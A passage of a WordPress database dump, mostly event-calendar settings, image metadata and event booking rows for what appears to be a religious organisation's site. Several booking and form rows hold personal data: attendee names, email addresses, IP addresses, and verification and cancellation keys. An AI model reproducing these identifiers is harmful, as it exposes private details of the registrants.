\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(165487,266829,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(165488,266829,'mec_certain_weekdays','a:0:{}'),(165489,266829,'mec_allday','0'),(165490,266829,'one_occurrence','0'),(165491,266829,'mec_hide_time','0'),(165492,266829,'mec_hide_end_time','0'),(165493,266829,'mec_comment',''),(165494,266829,'mec_timezone','global'),(165495,266829,'mec_countdown_method','global'),(165496,266829,'mec_public','1'),(165497,266829,'mec_start_date','2022-07-06'),(165498,266829,'mec_start_time_hour','7'),(165499,266829,'mec_start_time_minutes','0'),(165500,266829,'mec_start_time_ampm','PM'),(165501,266829,'mec_start_day_seconds','68400'),(165502,266829,'mec_end_date','2022-07-06'),(165503,266829,'mec_end_time_hour','8'),(165504,266829,'mec_end_time_minutes','0'),(165505,266829,'mec_end_time_ampm','PM'),(165506,266829,'mec_end_day_seconds','72000'),(165507,266829,'mec_repeat_status','0'),(165508,266829,'mec_repeat_type',''),(165509,266829,'mec_repeat_interval','1'),(165510,266829,'mec_repeat_end',''),(165511,266829,'mec_repeat_end_at_occurrences',''),(165512,266829,'mec_repeat_end_at_date',''),(165513,266829,'mec_advanced_days','a:0:{}'),(165514,266829,'mec_in_days',''),(165515,266829,'mec_not_in_days',''),(165516,266829,'mec_hourly_schedules','a:0:{}'),(165517,266829,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(165518,266829,'mec_tickets','a:0:{}'),(165519,266829,'mec_fees_global_inheritance','1'),(165520,266829,'mec_fees','a:0:{}'),(165521,266829,'mec_ticket_variations_global_inheritance','1'),(165522,266829,'mec_ticket_variations','a:0:{}'),(165523,266829,'mec_reg_fields_global_inheritance','1'),(165524,266829,'mec_reg_fields','a:0:{}'),(165525,266829,'mec_bfixed_fields','a:0:{}'),(165526,266829,'mec_op','a:0:{}'),(165527,266829,'mec_fields','a:0:{}'),(165528,266829,'mec_event_status','EventScheduled'),(165529,266829,'mec_moved_online_link',''),(165530,266829,'mec_cancelled_reason',''),(165531,266829,'mec_display_cancellation_reason_in_single_page',''),(165532,266829,'boldgrid_hide_page_title','0'),(165533,266829,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(165534,266829,'passster_activate_global_protection',NULL),(165535,266829,'passster_activate_protection',NULL),(165536,266829,'passster_protection_type','password'),(165539,266829,'_dp_original','266104'),(165538,266829,'boldgrid_in_page_containers','1'),(165540,266829,'_edit_lock','1656107276:15'),(165541,266829,'_edit_last','15'),(165542,266830,'_wp_attached_file','2022/06/GoldenHand.webp'),(165543,266830,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:23:\"2022/06/GoldenHand.webp\";s:8:\"filesize\";i:40944;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"GoldenHand-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14244;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"GoldenHand-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6198;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:23:\"GoldenHand-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:16734;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:23:\"GoldenHand-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:30222;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:23:\"GoldenHand-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:23142;}s:8:\"tileview\";a:5:{s:4:\"file\";s:23:\"GoldenHand-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:17740;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(165544,266829,'_thumbnail_id','266830'),(165545,266831,'protect_children',''),(165546,266831,'mec_color',''),(165547,266831,'mec_location_id','118'),(165548,266831,'mec_dont_show_map','0'),(165549,266831,'mec_organizer_id','1'),(165550,266831,'mec_read_more',''),(165551,266831,'mec_more_info',''),(165552,266831,'mec_more_info_title',''),(165553,266831,'mec_more_info_target','_self'),(165554,266831,'mec_cost',''),(165555,266831,'mec_currency','a:0:{}'),(165556,266831,'mec_additional_organizer_ids','a:0:{}'),(165557,266831,'mec_additional_location_ids','a:0:{}'),(165558,266831,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-08-03\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-08-03\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(165559,266831,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(165560,266831,'mec_certain_weekdays','a:0:{}'),(165561,266831,'mec_allday','0'),(165562,266831,'one_occurrence','0'),(165563,266831,'mec_hide_time','0'),(165564,266831,'mec_hide_end_time','0'),(165565,266831,'mec_comment',''),(165566,266831,'mec_timezone','global'),(165567,266831,'mec_countdown_method','global'),(165568,266831,'mec_public','1'),(165569,266831,'mec_start_date','2022-08-03'),(165570,266831,'mec_start_time_hour','7'),(165571,266831,'mec_start_time_minutes','0'),(165572,266831,'mec_start_time_ampm','PM'),(165573,266831,'mec_start_day_seconds','68400'),(165574,266831,'mec_end_date','2022-08-03'),(165575,266831,'mec_end_time_hour','8'),(165576,266831,'mec_end_time_minutes','0'),(165577,266831,'mec_end_time_ampm','PM'),(165578,266831,'mec_end_day_seconds','72000'),(165579,266831,'mec_repeat_status','0'),(165580,266831,'mec_repeat_type',''),(165581,266831,'mec_repeat_interval','1'),(165582,266831,'mec_repeat_end',''),(165583,266831,'mec_repeat_end_at_occurrences',''),(165584,266831,'mec_repeat_end_at_date',''),(165585,266831,'mec_advanced_days','a:0:{}'),(165586,266831,'mec_in_days',''),(165587,266831,'mec_not_in_days',''),(165588,266831,'mec_hourly_schedules','a:0:{}'),(165589,266831,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(165590,266831,'mec_tickets','a:0:{}'),(165591,266831,'mec_fees_global_inheritance','1'),(165592,266831,'mec_fees','a:0:{}'),(165593,266831,'mec_ticket_variations_global_inheritance','1'),(165594,266831,'mec_ticket_variations','a:0:{}'),(165595,266831,'mec_reg_fields_global_inheritance','1'),(165596,266831,'mec_reg_fields','a:0:{}'),(165597,266831,'mec_bfixed_fields','a:0:{}'),(165598,266831,'mec_op','a:0:{}'),(165599,266831,'mec_fields','a:0:{}'),(165600,266831,'mec_event_status','EventScheduled'),(165601,266831,'mec_moved_online_link',''),(165602,266831,'mec_cancelled_reason',''),(165603,266831,'mec_display_cancellation_reason_in_single_page',''),(165604,266831,'boldgrid_hide_page_title','0'),(165605,266831,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(165606,266831,'passster_activate_global_protection',NULL),(165607,266831,'passster_activate_protection',NULL),(165608,266831,'passster_protection_type','password'),(165609,266831,'boldgrid_in_page_containers','1'),(165612,266831,'_dp_original','266829'),(165611,266831,'_thumbnail_id','266830'),(165613,266831,'_edit_lock','1656107507:15'),(165614,266830,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/06/GoldenHand.webp - cannot be optimized, it has an invalid file type'),(165615,266830,'smush-complete',''),(165616,266831,'_edit_last','15'),(165617,266832,'protect_children',''),(165618,266832,'mec_color',''),(165619,266832,'mec_location_id','118'),(165620,266832,'mec_dont_show_map','0'),(165621,266832,'mec_organizer_id','1'),(165622,266832,'mec_read_more',''),(165623,266832,'mec_more_info',''),(165624,266832,'mec_more_info_title',''),(165625,266832,'mec_more_info_target','_self'),(165626,266832,'mec_cost',''),(165627,266832,'mec_currency','a:0:{}'),(165628,266832,'mec_additional_organizer_ids','a:0:{}'),(165629,266832,'mec_additional_location_ids','a:0:{}'),(165630,266832,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-09-07\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-09-07\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(165631,266832,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(165632,266832,'mec_certain_weekdays','a:0:{}'),(165633,266832,'mec_allday','0'),(165634,266832,'one_occurrence','0'),(165635,266832,'mec_hide_time','0'),(165636,266832,'mec_hide_end_time','0'),(165637,266832,'mec_comment',''),(165638,266832,'mec_timezone','global'),(165639,266832,'mec_countdown_method','global'),(165640,266832,'mec_public','1'),(165641,266832,'mec_start_date','2022-09-07'),(165642,266832,'mec_start_time_hour','7'),(165643,266832,'mec_start_time_minutes','0'),(165644,266832,'mec_start_time_ampm','PM'),(165645,266832,'mec_start_day_seconds','68400'),(165646,266832,'mec_end_date','2022-09-07'),(165647,266832,'mec_end_time_hour','8'),(165648,266832,'mec_end_time_minutes','0'),(165649,266832,'mec_end_time_ampm','PM'),(165650,266832,'mec_end_day_seconds','72000'),(165651,266832,'mec_repeat_status','0'),(165652,266832,'mec_repeat_type',''),(165653,266832,'mec_repeat_interval','1'),(165654,266832,'mec_repeat_end',''),(165655,266832,'mec_repeat_end_at_occurrences',''),(165656,266832,'mec_repeat_end_at_date',''),(165657,266832,'mec_advanced_days','a:0:{}'),(165658,266832,'mec_in_days',''),(165659,266832,'mec_not_in_days',''),(165660,266832,'mec_hourly_schedules','a:0:{}'),(165661,266832,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(165662,266832,'mec_tickets','a:0:{}'),(165663,266832,'mec_fees_global_inheritance','1'),(165664,266832,'mec_fees','a:0:{}'),(165665,266832,'mec_ticket_variations_global_inheritance','1'),(165666,266832,'mec_ticket_variations','a:0:{}'),(165667,266832,'mec_reg_fields_global_inheritance','1'),(165668,266832,'mec_reg_fields','a:0:{}'),(165669,266832,'mec_bfixed_fields','a:0:{}'),(165670,266832,'mec_op','a:0:{}'),(165671,266832,'mec_fields','a:0:{}'),(165672,266832,'mec_event_status','EventScheduled'),(165673,266832,'mec_moved_online_link',''),(165674,266832,'mec_cancelled_reason',''),(165675,266832,'mec_display_cancellation_reason_in_single_page',''),(165676,266832,'boldgrid_hide_page_title','0'),(165677,266832,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(165678,266832,'passster_activate_global_protection',NULL),(165679,266832,'passster_activate_protection',NULL),(165680,266832,'passster_protection_type','password'),(165681,266832,'boldgrid_in_page_containers','1'),(165682,266832,'_thumbnail_id','266830'),(165684,266832,'_dp_original','266831'),(165685,266832,'_edit_lock','1656107801:15'),(165686,266832,'_edit_last','15'),(165687,266833,'_field_224','Gwen'),(165688,266833,'_field_225','Sapphire'),(165689,266833,'_field_226','songwriter999@gmail.com'),(165690,266833,'_field_227','CA'),(165691,266833,'_field_228','US'),(165692,266833,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(165693,266833,'_form_id','21'),(165694,266833,'_seq_num','152'),(165695,266834,'mec_transaction_id','GNP44203'),(165696,266834,'mec_user_id','1000032'),(165697,266834,'mec_verified','1'),(165698,266834,'mec_verification_key','3ed36cc2ce439dfed2f12d886f04c4d6'),(165699,266834,'mec_cancellation_key','027bd9f337424c6654f02a07ba8f737c'),(165700,266834,'mec_confirmed','1'),(165701,266834,'mec_event_id','266820'),(165702,266834,'mec_date','1657449000:1657495800'),(165703,266834,'mec_ticket_id',',1,'),(165704,266834,'mec_booking_time','2022-06-28 09:09:42'),(165705,266834,'mec_all_dates','a:0:{}'),(165706,266834,'mec_other_dates','a:0:{}'),(165707,266834,'mec_attention_time','1657449000:1657495800'),(165708,266834,'mec_attention_time_start','1657449000'),(165709,266834,'mec_attention_time_end','1657495800'),(165710,266834,'mec_book_date_submit','20220628090942'),(165711,266834,'mec_booking_location','129'),(165712,266834,'mec_ticket_price_1','0'),(165713,266834,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"stoneycole78@gmail.com\";s:4:\"name\";s:11:\"Sarah Cole \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:15:\"174.212.228.104\";}}'),(165714,266834,'mec_price','0'),(165715,266834,'mec_gateway','MEC_gateway_free'),(165716,266834,'mec_gateway_label','Free'),(165717,266835,'mec_transaction_id','MEX17710'),(165718,266835,'mec_user_id','1000022'),(165719,266835,'mec_verified','1'),(165720,266835,'mec_verification_key','319a500ce6225567ff48426bf4e902bc'),(165721,266835,'mec_cancellation_key','b6e94289215e07270072b018a428e899'),(165722,266835,'mec_confirmed','1'),(165723,266835,'mec_event_id','266815'),(165724,266835,'mec_date','1656844200:1656891000'),(165725,266835,'mec_ticket_id',',1,'),(165726,266835,'mec_booking_time','2022-06-28 13:54:35'),(165727,266835,'mec_all_dates','a:0:{}'),(165728,266835,'mec_other_dates','a:0:{}'),(165729,266835,'mec_attention_time','1656844200:1656891000'),(165730,266835,'mec_attention_time_start','1656844200'),(165731,266835,'mec_attention_time_end','1656891000'),(165732,266835,'mec_book_date_submit','20220628135435'),(165733,266835,'mec_booking_location','118'),(165734,266835,'mec_ticket_price_1','0'),(165735,266835,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santaigo\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"24.2.76.182\";}}'),(165736,266835,'mec_price','0'),(165737,266835,'mec_gateway','MEC_gateway_free'),(165738,266835,'mec_gateway_label','Free'),(165739,266836,'mec_transaction_id','MWK57524'),(165740,266836,'mec_user_id','1000022'),(165741,266836,'mec_verified','1'),(165742,266836,'mec_verification_key','20013b324f788592c8ffb70adb0fbd57'),(165743,266836,'mec_cancellation_key','96b0d2522c501b40e4b5575e404e64d3'),(165744,266836,'mec_confirmed','1'),(165745,266836,'mec_event_id','266820'),(165746,266836,'mec_date','1657449000:1657495800'),(165747,266836,'mec_ticket_id',',1,'),(165748,266836,'mec_booking_time','2022-06-28 14:01:32'),(165749,266836,'mec_all_dates','a:0:{}'),(165750,266836,'mec_other_dates','a:0:{}'),(165751,266836,'mec_attention_time','1657449000:1657495800'),(165752,266836,'mec_attention_time_start','1657449000'),(165753,266836,'mec_attention_time_end','1657495800'),(165754,266836,'mec_book_date_submit','20220628140132'),(165755,266836,'mec_booking_location','129'),(165756,266836,'mec_ticket_price_1','0'),(165757,266836,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"jorge santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"24.2.76.182\";}}'),(165758,266836,'mec_price','0'),(165759,266836,'mec_gateway','MEC_gateway_free'),(165760,266836,'mec_gateway_label','Free'),(165761,266838,'mec_color',''),(165762,266838,'mec_location_id','122'),(165763,266838,'mec_dont_show_map','0'),(165764,266838,'mec_organizer_id','1'),(165765,266838,'mec_read_more',''),(165766,266838,'mec_more_info',''),(165767,266838,'mec_more_info_title',''),(165768,266838,'mec_more_info_target','_self'),(165769,266838,'mec_cost',''),(165770,266838,'mec_currency','a:0:{}'),(165771,266838,'mec_additional_organizer_ids','a:0:{}'),(165772,266838,'mec_additional_location_ids','a:0:{}'),(165773,266838,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-07-24\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-07-24\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(165774,266838,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(165775,266838,'mec_certain_weekdays','a:0:{}'),(165776,266838,'mec_allday','0'),(165777,266838,'one_occurrence','0'),(165778,266838,'mec_hide_time','0'),(165779,266838,'mec_hide_end_time','0'),(165780,266838,'mec_comment',''),(165781,266838,'mec_timezone','global'),(165782,266838,'mec_countdown_method','global'),(165783,266838,'mec_public','1'),(165784,266838,'mec_start_date','2022-07-24'),(165785,266838,'mec_start_time_hour','10'),(165786,266838,'mec_start_time_minutes','30'),(165787,266838,'mec_start_time_ampm','AM'),(165788,266838,'mec_start_day_seconds','37800'),(165789,266838,'mec_end_date','2022-07-24'),(165790,266838,'mec_end_time_hour','11'),(165791,266838,'mec_end_time_minutes','30'),(165792,266838,'mec_end_time_ampm','AM'),(165793,266838,'mec_end_day_seconds','41400'),(165794,266838,'mec_repeat_status','0'),(165795,266838,'mec_repeat_type',''),(165796,266838,'mec_repeat_interval','1'),(165797,266838,'mec_repeat_end',''),(165798,266838,'mec_repeat_end_at_occurrences',''),(165799,266838,'mec_repeat_end_at_date',''),(165800,266838,'mec_advanced_days','a:0:{}'),(165801,266838,'mec_in_days',''),(165802,266838,'mec_not_in_days',''),(165803,266838,'mec_hourly_schedules','a:0:{}'),(165804,266838,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(165805,266838,'mec_tickets','a:0:{}'),(165806,266838,'mec_fees_global_inheritance','1'),(165807,266838,'mec_fees','a:0:{}'),(165808,266838,'mec_ticket_variations_global_inheritance','1'),(165809,266838,'mec_ticket_variations','a:0:{}'),(165810,266838,'mec_reg_fields_global_inheritance','1'),(165811,266838,'mec_reg_fields','a:0:{}'),(165812,266838,'mec_bfixed_fields','a:0:{}'),(165813,266838,'mec_op','a:0:{}'),(165814,266838,'mec_fields','a:0:{}'),(165815,266838,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(165816,266838,'mec_event_status','EventScheduled'),(165817,266838,'mec_moved_online_link',''),(165818,266838,'mec_cancelled_reason',''),(165819,266838,'mec_display_cancellation_reason_in_single_page',''),(165820,266838,'protect_children',''),(165821,266838,'passster_activate_global_protection',NULL),(165822,266838,'passster_activate_protection',NULL),(165823,266838,'passster_protection_type','password'),(165824,266838,'boldgrid_hide_page_title','0'),(165825,266838,'_thumbnail_id','266839'),(165828,266838,'_dp_original','266311'),(165827,266838,'boldgrid_in_page_containers','1'),(165829,266838,'_edit_lock','1656791824:2'),(165830,266838,'_edit_last','2'),(165831,266839,'_wp_attached_file','2022/07/waterfalls-2.jpg'),(165832,266839,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:771;s:6:\"height\";i:434;s:4:\"file\";s:24:\"2022/07/waterfalls-2.jpg\";s:8:\"filesize\";i:120286;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"waterfalls-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18729;}s:9:\"thumbnail\";a:5:{s